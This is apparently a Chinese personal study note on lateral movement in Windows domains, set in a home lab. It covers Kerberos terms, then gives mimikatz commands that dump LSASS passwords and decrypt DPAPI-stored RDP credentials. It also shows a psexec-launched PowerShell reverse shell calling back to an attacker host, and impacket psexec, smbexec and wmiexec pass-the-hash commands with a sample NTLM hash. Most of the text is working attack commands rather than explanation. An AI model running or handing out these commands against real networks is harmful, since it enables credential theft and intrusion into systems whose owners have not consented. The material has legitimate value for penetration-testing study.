type
status
date
slug
summary
tags
category
icon
password
横向移动:一般指在有一台内网服务器权限的情况下获取其他内网shell的过程
kerveros认证单词解释:#例
KDC:密钥分发中心,包含AS和TGS
AS:身份认证服务
TGS:票据授予服务
TGT:由身份认证服务授予的票据,默认有效时长10h
PTT------(pass-the-ticket)
这些工具都集成在cs中,此处只是初使用,理解一下工具
MIMIKATZ猕猴桃(针对windows)
(域)读取密码:方法1(受害机器上):
上传mimikatz.exe至服务器
使用以下命令得到密码(明文密码低版本才能成功),更多时候得不到:
mimikatz.exeprivilege::debug 提升权限sekurlsa::logonpasswords 导出密码信息
(域)读取密码:方法2(随意一台机器上):
通过转存受害者服务器的lsass进程在本地进行密码获取
任务管理器----进程-----lsass.exe------右键转存
使用以下命令读取dmp文件的内容:
privilege::debug #权限提升
sekurlsa::minidump lsass.dmp #选择转存文件(建议将lsass.dmp文件放于猕猴桃同一目录)
sekurlsa::logonpasswords #导出密码信息,在靶机上直接获取导出rdp连接信息
C:\Users\用户名\AppData\Local\Microsoft\Credentials\
这个文件夹下存在windows的rdp连接凭据,假如其中一个名为名为:2C4AE716B33E66755F96BB41C2CF2D67
使用以下命令:
privilege::debug#权限提升dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\2C4AE716B33E66755F96BB41C2CF2D67sekurlsa::dpapi#导出masterkey#通过这个命令查到的guidmasterkey将密码部份解密
dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\2C4AE716B33E66755F96BB41C2CF2D67 /masterkey:2007ac78462779f2754d64efff65668ce9559ec478a40ebce8444e76130e4164af3cdbe92092d24b2cbd0386426fd70b85dabacc2c6a2bdf4fb36559e93142e2
此处没有例子,没有凭据,不做实验了,懂原理了直接cs点点点了。psexec
域环境:winserver2008(192.168.245.134) win7(192.168.245.138)
域外:kali: 192.168.245.132
互相都可以ping通
实验:
建立2008与win7的连接
net use \\ip输入用户名,密码,建立成功后如图
通过psexec执行命令
psexec.exe \\192.168.245.138 whoami
将whoami改为 反弹shell的powershell命令
psexec.exe \\192.168.245.138 powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.245.132',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
通过-s可以以系统权限执行命令
psexec.exe \\192.168.245.138 -s whoami
impacket工具包
一款可以模拟各种协议的工具包
命令1:
python psexec.py 账户:密码@192.168.1.10
命令2:
python smbexec.py 账户:密码@192.168.1.10
无明文密码的连接方法
- 爆破:九头蛇,msf,超级弱口令,goby
- 使用hash传递
python3 wmiexec.py -hashes lm hash:ntlm hash 域名/用户名@ip
有机会再详细写,此处给出示例(ntlm可以在猕猴桃命令
sekurlsa::logonpasswords看见):好像只需要ntlm hash就可以。
python3 wmiexec.py -hashes 00000000000000000000000000000000:70f36703546aebe88c73fa45c4ecb3b8
qq/administrator@192.168.10.146